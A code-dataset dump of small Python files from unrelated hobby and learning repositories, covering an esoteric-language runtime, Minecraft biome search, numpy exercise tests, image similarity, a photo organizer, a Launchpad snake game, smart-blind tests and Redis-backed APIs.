metadata (dict) | text (string, lengths 60 to 3.49M)
---|---
{
"source": "4gboframram/PySenpai",
"score": 3
} |
#### File: senpai_lang/lib/senpai_os.py
```python
from senpai_lang.pyutils import FuncBase, PyModule
import os
class System(FuncBase):
"""
Can take 2 or 1 argument
First argument is always the command to execute.
Second argument can be anything,
Second argument if it exists returns the value os.system()
On Unix, the return value is the exit status of the process encoded in the format specified for wait().
On Windows, the return value is that returned by the system shell after running command. The shell is given by the Windows environment variable COMSPEC: it is usually cmd.exe, which returns the exit status of the command run; on systems using a non-native shell, consult your shell documentation.
"""
name = 'cmd'
def __init__(self):
super().__init__(self.name, self.system)
@staticmethod
def system(*args):
if len(args) == 1:
os.system(*args)
else:
return os.system(args[0])
PyModule('os', [System])
```
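A minimal sketch of calling the wrapper above directly from Python, mirroring the one-argument vs two-argument behaviour the docstring describes (the import path is assumed from the file location, and the second argument is just a dummy flag requesting the exit status):
```python
# Hypothetical direct use of the System wrapper defined above
from senpai_lang.lib.senpai_os import System  # assumed package path

System.system("echo hello")                # one argument: run, status discarded
status = System.system("echo hello", 1)    # two arguments: exit status returned
print(status)
```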
#### File: senpai_lang/lib/stack.py
```python
from senpai_lang.pyutils import FuncBase, PyModule
class CurrentStack(FuncBase):
"""Returns a reference to the current stack. Things can get weird..."""
name = "cur"
def __init__(self):
super().__init__(self.name, self.current_stack)
def current_stack(self):
return self.interpreter.stacks.current_stack
class GetStack(FuncBase):
"""Returns a reference to the stack with that name. All changes to that stack will be reflected in the stack returned and vice versa."""
name = "get"
def __init__(self):
super().__init__(self.name, self.get_stack)
def get_stack(self, name):
return self.interpreter.stacks[name]
class SwitchStack(FuncBase):
"""Switch the current stack to a stack with that name. Creates an empty stack if the name does not exist. Essentially the same thing as the builtin instruction, but it can take any hashable object as the key and allows the creation of stacks with undetermined names"""
name = "switch"
def __init__(self):
super().__init__(self.name, self.switch_stack)
def switch_stack(self, name):
self.interpreter.stacks.switch_stack(name)
class DeleteStack(FuncBase):
"""Deletes a stack with a given name"""
name = "del"
def __init__(self):
super().__init__(self.name, self.del_stack)
def del_stack(self, name):
del self.interpreter.stacks[name]
PyModule('stack', [CurrentStack, GetStack, SwitchStack, DeleteStack])
``` |
{
"source": "4gboframram/Pyubiomes",
"score": 3
} |
#### File: Pyubiomes/Pyubiomes/nether.py
```python
from minecraft_nether_gen_rs import NetherGen,create_new_nether,get_biome,NetherBiomes,delete,get_biome_structure,get_biome_decorator
import ctypes
import minecraft_nether_gen_rs
#Huge thanks to Neil for making a commit of minecraft_nether_gen_rs that can be used on an outdated Rust toolchain.
#He is the smart one behind the nether shit. I'm just the one asking
#him stupid questions and trying to make the Python simpler
def nether_biome_at_pos(seed: int, x: int, z: int):
    '''
    Returns the nether biome at the given position (sampled at y=64).
    Parameters:
        seed:
            The world seed
        x:
            The x-coordinate of the point the searcher will search
        z:
            The z-coordinate of the point the searcher will search
    '''
    nether_gen: ctypes.POINTER(NetherGen) = create_new_nether(seed)
    return get_biome(nether_gen, x, 64, z)
def nether_biomes_in_area(seed: int, biomes: list, x1: int, z1: int, x2: int, z2: int, incrementor: int = 8):
    '''
    Finds whether all of the biomes in the list are present in the area.
    The incrementor is the spacing between the blocks the searcher checks (default=8).
    Returns: bool
    '''
    if seed < 0:
        seed += 1 << 64
    nether_gen: ctypes.POINTER(NetherGen) = create_new_nether(seed)
    biomes_set = set(biomes)
    biomes_in_area = set()
    searchx = x1
    while searchx <= x2:
        searchz = z1
        while searchz <= z2:
            biome = get_biome(nether_gen, searchx, 64, searchz)
            if biome in biomes_set:
                biomes_in_area.add(biome)
                if biomes_set == biomes_in_area:
                    return True
            searchz += incrementor
        searchx += incrementor
return False
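# A minimal usage sketch (hypothetical seed and coordinates, commented out so the
# module stays import-only):
# if __name__ == "__main__":
#     seed = 123456789
#     target = nether_biome_at_pos(seed, 0, 0)
#     print(target)
#     print(nether_biomes_in_area(seed, [target], -64, -64, 64, 64))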
``` |
{
"source": "4GeeksAcademy/numpy-100",
"score": 2
} |
#### File: exercises/002-import-numpy/test.py
```python
import os, pytest, re
@pytest.mark.it("Import Numpy as np on the app.py file")
def test_declare_variable():
path = 'app.py'
with open(path, 'r') as content_file:
content = content_file.read()
regex = re.compile(r"import\s+numpy\s+as\s+np")
assert bool(regex.search(content)) == True
```
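For reference, a minimal `app.py` that satisfies this test only needs the import statement the regex looks for:
```python
# app.py (minimal solution sketch)
import numpy as np
```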
#### File: exercises/007-change-vector-values/test.py
```python
import pytest
import os
@pytest.mark.it("Use the zeros() function")
def test_output():
f = open('app.py')
content = f.read()
assert content.find("zeros(") > 0
@pytest.mark.it('The output should be a null vector of size 10 and the fifth value should be 1')
def test_print(capsys):
import app
captured = capsys.readouterr()
assert captured.out == '[0. 0. 0. 0. 1. 0. 0. 0. 0. 0.]\n'
```
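A minimal `app.py` that passes both checks: it uses `zeros()` to build a length-10 null vector and sets the fifth value to 1, producing exactly the expected output:
```python
# app.py (minimal solution sketch) - prints '[0. 0. 0. 0. 1. 0. 0. 0. 0. 0.]'
import numpy as np

Z = np.zeros(10)
Z[4] = 1
print(Z)
```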
#### File: exercises/012-identity-matrix/test.py
```python
import pytest
import os
@pytest.mark.it("You have to use the eye() method")
def test_output():
f = open('app.py')
content = f.read()
assert "eye(" in content
@pytest.mark.it('The output should be a 3x3 identity matrix')
def test_print(capsys):
import app
captured = capsys.readouterr()
assert captured.out == '[[1. 0. 0.]\n [0. 1. 0.]\n [0. 0. 1.]]\n'
``` |
{
"source": "4-geeks/image-sim",
"score": 2
} |
#### File: 4-geeks/image-sim/search.py
```python
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
from glob import glob
from PIL import Image
import torchvision.models as models
import torch
from utils import gram_matrix, transform, cos
import pandas as pd
import json
def search(query_pil,model, db='index.json'):
if type(db) == str:
with open(db) as json_file:
data = json.load(json_file)
db = pd.DataFrame(data)
query = transform(query_pil.convert('RGB'))
qFeatures = model(query.unsqueeze(0))
qGram = gram_matrix(qFeatures).flatten()
scores = db['Gram'].apply(lambda x: cos(torch.tensor(x),qGram).item())
name = db['Name'][scores.argmax()]
score = round(scores.max(),3)
return name, score
query_folder = 'queries'
database_folder = 'database'
result_folder = 'results'
db_path = 'index.json'
if not os.path.isdir(result_folder):
os.mkdir(result_folder)
plt.ioff()
if __name__ == "__main__":
simNet = torch.nn.Sequential(*list(models.vgg16(pretrained=True).features.modules())[1:14])
with open(db_path) as json_file:
data = json.load(json_file)
db = pd.DataFrame(data)
queries_list = sorted(glob(os.path.join(query_folder,'*.jpg')) + glob(os.path.join(query_folder,'*.png')))
if not queries_list:
        raise ValueError('the [{}] folder does not exist or is empty'.format(query_folder))
for query_path in queries_list:
query_pil = Image.open(query_path)
name, score = search(query_pil, simNet)
match_pil = Image.open(os.path.join(database_folder,name))
fig,ax = plt.subplots(1,2)
ax[0].imshow(query_pil)
ax[1].imshow(match_pil)
plt.savefig(format(os.path.join(result_folder,query_path.split('/')[-1])))
print(query_path ,name, score)
``` |
{
"source": "4-geeks/score_sde_pytorch",
"score": 3
} |
#### File: score_sde_pytorch/models/ema.py
```python
from __future__ import division
from __future__ import unicode_literals
import torch
# Partially based on: https://github.com/tensorflow/tensorflow/blob/r1.13/tensorflow/python/training/moving_averages.py
class ExponentialMovingAverage:
"""
Maintains (exponential) moving average of a set of parameters.
"""
def __init__(self, parameters, decay, use_num_updates=True):
"""
Args:
parameters: Iterable of `torch.nn.Parameter`; usually the result of
`model.parameters()`.
decay: The exponential decay.
use_num_updates: Whether to use number of updates when computing
averages.
"""
if decay < 0.0 or decay > 1.0:
raise ValueError('Decay must be between 0 and 1')
self.decay = decay
self.num_updates = 0 if use_num_updates else None
self.shadow_params = [p.clone().detach()
for p in parameters if p.requires_grad]
self.collected_params = []
def update(self, parameters):
"""
Update currently maintained parameters.
Call this every time the parameters are updated, such as the result of
the `optimizer.step()` call.
Args:
parameters: Iterable of `torch.nn.Parameter`; usually the same set of
parameters used to initialize this object.
"""
decay = self.decay
if self.num_updates is not None:
self.num_updates += 1
decay = min(decay, (1 + self.num_updates) / (10 + self.num_updates))
one_minus_decay = 1.0 - decay
with torch.no_grad():
parameters = [p for p in parameters if p.requires_grad]
for s_param, param in zip(self.shadow_params, parameters):
s_param.sub_(one_minus_decay * (s_param - param))
def copy_to(self, parameters):
"""
Copy current parameters into given collection of parameters.
Args:
parameters: Iterable of `torch.nn.Parameter`; the parameters to be
updated with the stored moving averages.
"""
parameters = [p for p in parameters if p.requires_grad]
for s_param, param in zip(self.shadow_params, parameters):
if param.requires_grad:
param.data.copy_(s_param.data)
def store(self, parameters):
"""
Save the current parameters for restoring later.
Args:
parameters: Iterable of `torch.nn.Parameter`; the parameters to be
temporarily stored.
"""
self.collected_params = [param.clone() for param in parameters]
def restore(self, parameters):
"""
Restore the parameters stored with the `store` method.
Useful to validate the model with EMA parameters without affecting the
original optimization process. Store the parameters before the
`copy_to` method. After validation (or model saving), use this to
restore the former parameters.
Args:
parameters: Iterable of `torch.nn.Parameter`; the parameters to be
updated with the stored parameters.
"""
for c_param, param in zip(self.collected_params, parameters):
param.data.copy_(c_param.data)
def state_dict(self):
return dict(decay=self.decay, num_updates=self.num_updates,
shadow_params=self.shadow_params)
def load_state_dict(self, state_dict):
self.decay = state_dict['decay']
self.num_updates = state_dict['num_updates']
self.shadow_params = state_dict['shadow_params']
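# A minimal usage sketch, assuming a PyTorch `model`, `optimizer`, data `loader`,
# and `compute_loss`/`validate` helpers (all hypothetical names), following the
# store/copy_to/restore workflow described in the docstrings above:
#
#   ema = ExponentialMovingAverage(model.parameters(), decay=0.999)
#   for batch in loader:
#       optimizer.zero_grad()
#       compute_loss(model, batch).backward()
#       optimizer.step()
#       ema.update(model.parameters())
#   # Evaluate with EMA weights without losing the current training weights:
#   ema.store(model.parameters())
#   ema.copy_to(model.parameters())
#   validate(model)
#   ema.restore(model.parameters())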
``` |
{
"source": "4g/pictorg",
"score": 3
} |
#### File: 4g/pictorg/jobs.py
```python
import random
def create_job_file(src,dest,new_files_dict):
create_mkdir_jobs(src,dest,new_files_dict)
create_copy_jobs(src,dest,new_files_dict)
def create_mkdir_jobs(src,dest,new_files_dict):
with open(src+"/mkdirjobs.jb","w+") as mkdir_job:
for key in new_files_dict:
date = new_files_dict[key][1].replace(':',"/")
dirpath = "mkdir -p " + dest + "/" + date + "\n"
mkdir_job.write(dirpath)
mkdir_job.close()
def create_copy_jobs(src,dest,new_files_dict):
with open(src+"/copyjobs.jb","w+") as copy_job:
for key in new_files_dict:
src_path = new_files_dict[key][0]
date = new_files_dict[key][1].replace(':',"/")
dest_filename = dest + "/" + date + "/" + str(random.randint(1,1000000000)) + "." + src_path.split(".")[-1]
cpstr = "cp " + src_path + " " + dest_filename + "\n"
copy_job.write(cpstr)
copy_job.close()
```
#### File: 4g/pictorg/organizer.py
```python
import sys
from hash import get_hash
from jobs import create_job_file
from exif import get_date
import os
from os.path import join, abspath
def main(argv):
src = argv[0]
dest = argv[1]
new_files_dict = get_new_files_dict(src, dest)
create_job_file(src,dest,new_files_dict)
def get_new_files_dict(src, dest):
dest_dict = get_hash_dict(dest)
src_dict = get_hash_dict(src,dest_dict)
return src_dict
def get_hash_dict(root, dest_dict=None):
    hash_dict = dict()
    for file_path in get_files(root):
        try:
            date, hashv = get_date(file_path), get_hash(file_path)
            if dest_dict is None:
                hash_dict[hashv] = [file_path, date]
            elif hashv not in dest_dict:
                hash_dict[hashv] = [file_path, date]
        except:
            pass
    return hash_dict
def get_files(root):
for dirName, subdirList, fileList in os.walk(root):
for fname in fileList:
path = abspath(join(dirName, fname))
yield path
if __name__ == "__main__":
main(sys.argv[1:])
``` |
{
"source": "4gra/launchpad.py",
"score": 4
} |
#### File: launchpad.py/examples/ekans.py
```python
from launchpad_py.utils import *
import random
from time import sleep
from collections import deque
pause_btn = 0, 0
pause_colour = 3, 0
play_colour = 1, 0
def neighbours(x, y):
"""
within 0 <= x <= 7 and 1 <= y <= 8 return neighbouring squares
[x-1, y-1] [x, y-1] [x+1, y-1]
[x-1, y] [x, y] [x+1, y]
[x-1, y+1] [x, y+1] [x+1, y+1]
"""
neigh = []
for (nx, ny) in [(x, y-1), (x+1, y), (x, y+1), (x-1, y)]:
if 0 <= nx <= 7 and 1 <= ny <= 8:
neigh += [(nx, ny)]
return neigh
class Snake:
"""
This is a game for ����
love from �����
"""
field_colour = 0, 1
food_colour = 0, 3
head_colour = 3, 0
tail_colour = 2, 0
def __init__(self, lp):
#self.head = 4, 2 # position of the head of the snake
#self.tail = deque([(3, 2), (2, 2), (1, 2), (0, 2)])
self.paused = False
self.head = random.choice(
[(x, y) for x in range(0, 7) for y in range(1, 8)]
)
self.prev = []
self.tail = deque()
self.starting_length = 6
self.food = []
self.lp = lp
def __len__(self):
return len(self.tail) + 1
def pixels(self):
return [self.head] + list(self.tail)
def paint(self):
for pos in [p for p in self.food if p not in self.tail]:
self.lp.LedCtrlXY(*pos, *self.food_colour)
for pos in [p for p in self.prev if p not in self.tail and p not in self.food]:
self.lp.LedCtrlXY(*pos, *self.field_colour)
for pos in self.tail:
self.lp.LedCtrlXY(*pos, *self.tail_colour)
for pos in [self.head]:
self.lp.LedCtrlXY(*pos, *self.head_colour)
def place_food(self, x, y):
if (x, y) not in self.pixels():
self.food += [(x, y)]
def eat(self):
"""
eat food under the snake's head
"""
self.food.pop(
self.food.index(self.head)
)
def move(self, x, y):
"""
moves the snake's head to a new location
this will teleport a 1-length snake to (x,y) if the move is infeasible
"""
self.prev = self.pixels()
self.tail.append(self.head)
if len(self) > self.starting_length:
self.tail.popleft()
# moved
self.head = x, y
if self.head in self.food:
self.eat()
def possible_moves(self, x, y):
return [pos for pos in neighbours(x,y) if pos not in self.pixels()[1:]]
def random_move(self):
"""
Move randomly. The minimal lookahead will work indefinitely for a
snake of length <= 6
"""
self.prev = self.pixels()
self.tail.append(self.head)
if len(self) > self.starting_length:
self.tail.popleft()
# generate new head position choices TODO: do this first and have 'stay still' as a choice
new_heads = [pos for pos in neighbours(*self.head) if pos not in self.tail]
# lookahead one move, that's really all that's required
# we should just special-case the corners but this worked in a pinch
if len(new_heads) == 2:
new_heads = [h for h in new_heads if len(neighbours(*h)) != 2]
choices = list(new_heads)
#print(f"Choices are {choices}, having excluded {self.tail}")
self.head = random.choice(choices)
if self.head in self.food:
self.eat()
def game_loop():
with LaunchpadPlease(emulate=None) as lp:
snake = Snake(lp)
fill(lp, *snake.field_colour)
while True:
if not snake.paused:
snake.random_move()
lp.LedCtrlXY(*pause_btn, *pause_colour)
else:
lp.LedCtrlXY(*pause_btn, *play_colour)
snake.paint()
sleep(0.09)
# process all buttons in one go
if lp.ButtonChanged():
while True:
try:
(x, y, pressed) = lp.ButtonStateXY() # raises ValueError when state is None
print("+" if pressed else "-", x, y)
# momentary pause
#if (x, y) == (0, 0):
# snake.paused = pressed
# continue
if pressed:
# toggle pause
if (x, y) == (0, 0):
snake.paused = (not snake.paused)
continue
snake.place_food(x, y)
except ValueError: # when state == None
break
if __name__ == '__main__':
game_loop()
```
#### File: launchpad.py/launchpad_py/utils.py
```python
import launchpad_py as launchpad
from collections import defaultdict
OFF = (0, 0)
# (1,0): #
# (2,0): #
RED = (3, 0)
YELLOW = (3, 3)
# (0,1): #
# (0,2): #
GREEN = (0, 3)
# (3,1): #
# (2,1): #
# (3,2): #
# (1,3): #
# (1,2): #
# (2,3): #
# (2,2): #
# (1,1):
def tweak(rg):
"""
makes the most minimally visible change to a colour.
there's a mathematically neat way of doing this that evades me right now
(i.e. don't change r/g ratios except if one of them is zero.)
"""
(r, g) = rg
if r == 0 and g == 0:
return 0, 0
elif r == 1 and g == 1:
return 2, 2
elif r == 0:
if g == 1:
g += 1
else:
g -= 1
elif g == 0:
if r == 1:
r += 1
else:
r -= 1
else:
r -= 1
g -= 1
return r, g
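# A few sample input/output pairs, traced from the branches above, to make the
# "minimally visible change" behaviour concrete:
#   tweak((0, 0)) -> (0, 0)   # off stays off
#   tweak((1, 1)) -> (2, 2)
#   tweak((0, 1)) -> (0, 2)
#   tweak((0, 3)) -> (0, 2)
#   tweak((3, 0)) -> (2, 0)
#   tweak((3, 3)) -> (2, 2)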
class Colour:
"""
colour class.
experimental opacity or something?
TODO: hand-crafted mappings for each colour, because there's
no real correspondence between RGB and some LEDs.
"""
def __init__(self, r, g, o=1):
self.r = r
self.g = g
self.o = o
def tweak(self):
return tweak((self.r, self.g))
def rg(self):
return self.r, self.g
def rgbhex(self):
#diff = max(3-abs(self.r-self.g), 2)
b = 3 - (self.r + self.g)
return "#{:02x}{:02x}00".format(self.r*85, self.g*85, b*85)
def fill(lp, r, g, every_led=False):
"""fills the board with a single colour"""
if every_led:
raise NotImplementedError
for x in range(8):
for y in range(1, 9):
lp.LedCtrlXY(x, y, r, g)
class CachingLaunchpad(launchpad.Launchpad):
"""
a launchpad wrapper that stores last colour results.
Unfinished; probably will be merged into the LaunchpadEmu
"""
led = defaultdict(lambda: (0, 0)) # LED states
btn = {} # button states??
PRINT_CTR = None
ctr = 0
def __init__(self, print_ctr=500):
self.print_ctr = print_ctr
self.ctr = 0
super(CachingLaunchpad, self).__init__()
def LedCtrlXY(self, x, y, r, g):
# self.led[(x,y)] = Colour(r,g)
self.led[(x, y)] = (r, g)
if self.PRINT_CTR is not None and self.ctr > self.PRINT_CTR:
self.ctr = 0
print(self)
else:
self.ctr += 1
return super(CachingLaunchpad, self).LedCtrlXY(x, y, r, g)
# noinspection PyPep8Naming
def LedGetXY(self, x, y):
return self.led[(x, y)]
def __getitem__(self, xy):
return self.LedGetXY(*xy)
def cell_value(self, x, y):
"""
Prints out a representation of a cell value.
TODO: use ANSI colours.
"""
if x == 8 and y == 0:
return "--"
(r, g) = self[(x, y)]
return "%s%s" % (r, g)
def __repr__(self):
"""
Prints out a representation of the board.
"""
out = "\n"
for y in range(9):
out += "+--+--+--+--+--+--+--+--+--+\n"
out += ("|" + "|".join([self.cell_value(x, y) for x in range(9)]) + "|\n")
out += "+--+--+--+--+--+--+--+--+--+\n"
return out
class LaunchpadPlease:
"""
Makes a launchpad connection, and handles setup/shutdown in a 'with' block.
Opens an emulator (LaunchpadEmu) if none is available.
TODO: save/restore state :)
    Usage: with LaunchpadPlease() as lp: [...]
"""
def __init__(self, reset_on_close=False, emulate=False):
"""
:param reset_on_close: reset display (to zero) once application quits?
:param emulate: always use the emulator
"""
self.reset_on_close = reset_on_close
self.always_emulate = emulate
def __enter__(self):
self.lp = None
if self.always_emulate is True:
self.lp = LaunchpadEmu()
else:
try:
self.lp = launchpad.Launchpad()
self.lp.Open()
self.lp.ButtonFlush()
except:
if self.always_emulate is not False:
self.lp = launchpad.LaunchpadEmu()
return self.lp
def __exit__(self, type, value, traceback):
print("exiting with %s, %s, %s" % (type, value, traceback))
if self.reset_on_close:
self.lp.Reset() # turn all LEDs off
self.lp.Close() # close the Launchpad (will quit with an error due to a PyGame bug)
class Timer:
"""
    A simple tick counter: after SLEEP_TIME ticks it flags the display to go to sleep.
"""
SLEEP_TIME = 5000
def __init__(self, lp):
self.ticks = 0
self.lp = lp
self.sleep = False
self.blink = False
def draw(self):
"""
sets sleep mode.
"""
if not self.sleep:
return
# blank screen
# blink
def inc(self):
self.ticks += 1
if self.ticks >= self.SLEEP_TIME:
self.sleep = True
``` |
{
"source": "4gra/pytradfri",
"score": 3
} |
#### File: pytradfri/device/blind.py
```python
from pytradfri.const import ATTR_START_BLINDS, \
ATTR_BLIND_CURRENT_POSITION
class Blind:
"""Represent a blind."""
def __init__(self, device, index):
self.device = device
self.index = index
@property
def raw(self):
"""Return raw data that it represents."""
return self.device.raw[ATTR_START_BLINDS][self.index]
@property
def current_cover_position(self):
"""Get the current position of the blind."""
return self.raw.get(ATTR_BLIND_CURRENT_POSITION)
```
#### File: pytradfri/tests/test_util.py
```python
from pytradfri.error import PytradfriError
from pytradfri.util import load_json, save_json, BitChoices
import shutil
import tempfile
from os import path
import unittest
from unittest.mock import patch
import json
import pytest
class UtilTestsBitChoices(unittest.TestCase):
def test_bitchoices(self):
WEEKDAYS = BitChoices(
(
('tue', 'Tuesday'),
)
)
assert WEEKDAYS.get_selected_keys(1) == ['tue']
assert len(WEEKDAYS) == 1
assert [x for x in WEEKDAYS] == [(1, 'Tuesday')]
class UtilTestsJSON(unittest.TestCase):
def setUp(self):
self.test_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_json_save(self):
FILENAME = path.join(self.test_dir, 'sample_psk_file.txt')
conf = {'identity': 'pytradfri',
'key': '123abc'}
written_file = save_json(FILENAME, conf)
self.assertTrue(written_file)
def test_json_load(self):
f = open(path.join(self.test_dir, 'sample_psk_file2.txt'), 'w')
config = {'identity': 'hashstring',
'key': 'secretkey'}
data = json.dumps(config, sort_keys=True, indent=4)
f.write(data)
f.close()
json_data = load_json(path.join(self.test_dir,
'sample_psk_file2.txt'))
self.assertEqual(json_data,
{'identity': 'hashstring', 'key': 'secretkey'})
def test_load_file_not_found(self):
assert not load_json(path.join(self.test_dir, 'not_a_file'))
def test_load_not_json(self):
f = open(path.join(self.test_dir, 'sample_psk_file3.txt'), 'w')
data = '{not valid json'
f.write(data)
f.close()
with pytest.raises(PytradfriError):
load_json(path.join(self.test_dir, 'sample_psk_file3.txt'))
def test_save_not_serializable(self):
FILENAME = path.join(self.test_dir, 'should_not_save')
conf = b'bytes are not serializable'
with pytest.raises(PytradfriError):
save_json(FILENAME, conf)
def test_os_error(self):
with patch("builtins.open", side_effect=OSError(-1)):
with pytest.raises(PytradfriError):
load_json('whatever')
with pytest.raises(PytradfriError):
save_json('whatever', {})
``` |
{
"source": "4heck/auction_backend",
"score": 2
} |
#### File: auction_api/views/auction.py
```python
from drf_yasg import openapi
from drf_yasg.utils import swagger_auto_schema
from rest_framework import status
from rest_framework.generics import GenericAPIView
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from auction_api.models import Auction
from auction_api.serializers.auction import AuctionSerializer
from auction_api.services.email import send_new_auction_notifications
class AuctionAPIView(GenericAPIView):
permission_classes = [IsAuthenticated]
serializer_class = AuctionSerializer
queryset = Auction.objects.all()
def post(self, request):
serializer = self.serializer_class(data=request.data)
serializer.is_valid(raise_exception=True)
auction_instance = serializer.save()
send_new_auction_notifications(auction_instance)
return Response(serializer.data, status=status.HTTP_200_OK)
@swagger_auto_schema(
manual_parameters=[
openapi.Parameter(name="all", in_="query", type=openapi.TYPE_BOOLEAN),
openapi.Parameter(
name="only_active", in_="query", type=openapi.TYPE_BOOLEAN
),
openapi.Parameter(
name="only_closed", in_="query", type=openapi.TYPE_BOOLEAN
),
]
)
def get(self, request):
if len(request.query_params) > 1:
return Response(
"Using more than one parameter is not allowed",
status=status.HTTP_400_BAD_REQUEST,
)
if request.query_params.get("only_active") == "true":
self.queryset = self.get_queryset().is_active()
elif request.query_params.get("only_closed") == "true":
self.queryset = self.get_queryset().is_closed()
return Response(
self.serializer_class(instance=self.get_queryset(), many=True).data
)
``` |
{
"source": "4heck/ru102py",
"score": 2
} |
#### File: 4heck/ru102py/conftest.py
```python
import pytest
from redis import client as redis_client
from redisolar import create_app
from redisolar.core.connections import get_redis_connection
from redisolar.core.connections import get_redis_timeseries_connection
from redisolar.dao.redis.key_schema import KeySchema
TEST_CONFIG = 'testing.cfg'
CI_CONFIG = 'ci.cfg'
def pytest_addoption(parser):
parser.addoption(
"--ci",
action="store_true",
help="use the CI configuration",
)
def make_app(request, config):
"""Yield a Flask app from the config file specified in `config`."""
if request.config.getoption('ci'):
config = CI_CONFIG
app = create_app(config)
with app.app_context():
yield app
@pytest.fixture
def app(request):
yield from make_app(request, TEST_CONFIG)
@pytest.fixture
def client(app):
with app.test_client() as client:
yield client
@pytest.fixture
def redis(app):
yield get_redis_connection(app.config['REDIS_HOST'], app.config['REDIS_PORT'])
@pytest.fixture
def redis_timeseries(app):
yield get_redis_timeseries_connection(app.config['REDIS_HOST'],
app.config['REDIS_PORT'])
@pytest.fixture
def key_schema(app):
yield KeySchema(app.config['REDIS_KEY_PREFIX'])
def _delete_test_keys(prefix: str, conn: redis_client.Redis):
for key in conn.scan_iter(f"{prefix}:*"):
conn.delete(key)
@pytest.fixture(scope="function", autouse=True)
def delete_test_keys(request):
def cleanup():
app = next(make_app(request, TEST_CONFIG))
conn = get_redis_connection(app.config['REDIS_HOST'], app.config['REDIS_PORT'])
_delete_test_keys(app.config['REDIS_KEY_PREFIX'], conn)
request.addfinalizer(cleanup)
```
#### File: redisolar/api/meter_reading.py
```python
from typing import Any
from typing import Dict
from typing import List
from typing import Optional
from typing import Tuple
from flask_restful import Resource
from marshmallow import fields
from webargs.flaskparser import use_args
from redisolar.api.base import DaoResource
from redisolar.models import MeterReading
from redisolar.schema import MeterReadingsSchema
MAX_RECENT_FEEDS = 1000
DEFAULT_RECENT_FEEDS = 100
def get_feed_count(count: Optional[int]):
"""Decide a safe number of feeds to return."""
if count is None or count < 0:
return DEFAULT_RECENT_FEEDS
if count > MAX_RECENT_FEEDS:
return MAX_RECENT_FEEDS
return count
class GlobalMeterReadingResource(Resource):
"""A RESTful resource representing meter readings for all sites."""
def __init__(self, meter_reading_dao: Any, feed_dao: Any):
self.meter_reading_dao = meter_reading_dao
self.feed_dao = feed_dao
@use_args(MeterReadingsSchema)
def post(self, meter_readings: Dict[str, List[MeterReading]]) -> Tuple[str, int]:
"""Create a new meter reading."""
for reading in meter_readings['readings']:
self.meter_reading_dao.add(reading)
return "Accepted", 202
@use_args({"count": fields.Int()}, location="query")
def get(self, args: Dict[str, int]) -> Dict[str, Dict]:
"""Get a list of meter readings."""
count = args.get('count')
readings = self.feed_dao.get_recent_global(get_feed_count(count))
return MeterReadingsSchema().dump({"readings": readings})
class SiteMeterReadingResource(DaoResource):
"""A RESTful resource representing meter readings for specific sites."""
@use_args({"count": fields.Int()}, location="query")
def get(self, args, site_id):
"""Get recent meter readings for a specific site."""
count = args.get('count')
readings = self.dao.get_recent_for_site(site_id, get_feed_count(count))
return MeterReadingsSchema().dump({"readings": readings})
```
#### File: redisolar/api/site_geo.py
```python
from flask_restful import abort
from marshmallow import validate
from webargs import fields
from webargs.flaskparser import use_args
from redisolar.api.base import DaoResource
from redisolar.models import Coordinate
from redisolar.models import GeoQuery
from redisolar.models import GeoUnit
from redisolar.schema import SiteSchema
DEFAULT_RADIUS = 10.0
DEFAULT_GEO_UNIT = GeoUnit.KM
SITE_LIST_ARGS = {
"lat":
fields.Str(),
"lng":
fields.Str(),
"radius":
fields.Float(missing=DEFAULT_RADIUS),
"radius_unit":
fields.Str(missing=DEFAULT_GEO_UNIT.value,
validate=validate.OneOf([u.value for u in GeoUnit])),
"only_excess_capacity":
fields.Bool(missing=False)
}
class SiteGeoListResource(DaoResource):
@use_args(SITE_LIST_ARGS, location='query')
def get(self, args):
lng = args.get('lng')
lat = args.get('lat')
no_coordinates = lng is None and lat is None
coordinates_provided = lng is not None and lat is not None
if no_coordinates:
return SiteSchema(many=True).dump(self.dao.find_all())
if coordinates_provided:
coord = Coordinate(lng=lng, lat=lat)
query = GeoQuery(coordinate=coord,
radius=args['radius'],
radius_unit=GeoUnit(args['radius_unit']),
only_excess_capacity=args['only_excess_capacity'])
return SiteSchema(many=True).dump(self.dao.find_by_geo(query))
return 404
class SiteGeoResource(DaoResource):
def get(self, site_id):
site = self.dao.find_by_id(site_id)
if not site:
return abort(404, message=f"Site {site_id} does not exist")
return SiteSchema().dump(site)
```
#### File: dao/redis/base.py
```python
from redis.client import Redis
from redisolar.dao.redis.key_schema import KeySchema
class RedisDaoBase:
"""Shared functionality for Redis DAO classes."""
def __init__(self,
redis_client: Redis,
key_schema: KeySchema = None, **kwargs) -> None:
self.redis = redis_client
if key_schema is None:
key_schema = KeySchema()
self.key_schema = key_schema
```
#### File: dao/redis/metric_timeseries.py
```python
import datetime
from itertools import islice
from typing import List
import redis
from redisolar.dao.base import MetricDaoBase
from redisolar.dao.redis.base import RedisDaoBase
from redisolar.models import Measurement
from redisolar.models import MeterReading
from redisolar.models import MetricUnit
RETENTION_MS = 60 * 60 * 24 * 14 * 1000
def unix_milliseconds(time):
return int(time.timestamp() * 1000)
class MetricDaoRedisTimeseries(MetricDaoBase, RedisDaoBase):
def insert(self, meter_reading: MeterReading, **kwargs) -> None:
pipeline = kwargs.get('pipeline')
execute = False
if pipeline is None:
execute = True
pipeline = self.redis.pipeline()
self.insert_metric(meter_reading.site_id, meter_reading.wh_generated,
MetricUnit.WH_GENERATED, meter_reading.timestamp, pipeline)
self.insert_metric(meter_reading.site_id, meter_reading.wh_used,
MetricUnit.WH_USED, meter_reading.timestamp, pipeline)
self.insert_metric(meter_reading.site_id, meter_reading.temp_c,
MetricUnit.TEMP_CELSIUS, meter_reading.timestamp, pipeline)
if execute:
pipeline.execute()
def insert_metric(self, site_id: int, value: float, unit: MetricUnit,
time: datetime.datetime, pipeline: redis.client.Pipeline):
metric_key = self.key_schema.timeseries_key(site_id, unit)
time_ms = unix_milliseconds(time)
self.redis.add(metric_key, time_ms, value, RETENTION_MS) # type: ignore
def get_recent(self, site_id: int, unit: MetricUnit, time: datetime.datetime,
limit: int, **kwargs) -> List[Measurement]:
metric_key = self.key_schema.timeseries_key(site_id, unit)
time_ms = unix_milliseconds(time)
initial_timestamp = time_ms - (limit * 60) * 1000
values = self.redis.range(metric_key, initial_timestamp, time_ms) # type: ignore
return [
Measurement(site_id=site_id,
metric_unit=unit,
timestamp=value[0] / 1000,
value=value[1]) for value in islice(values, limit)
]
```
#### File: tests/scripts/test_update_if_lowest.py
```python
import pytest
from redisolar.scripts.update_if_lowest import UpdateIfLowestScript
def test_update_if_lowest(redis):
redis.set("test-lua", "100")
